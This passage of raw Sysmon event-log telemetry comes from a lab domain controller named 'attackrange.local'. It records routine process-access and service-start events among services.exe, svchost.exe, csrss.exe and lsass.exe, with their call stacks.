32\ntdll.dll+51791 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}848944C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.533{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}8481220C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}8481220C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll
+51791 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.533{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51
791 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0A00-00000000A301}8481108C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.525{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{59A5CD1D-8E46-6005-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 
10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.518{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.518{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.502{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
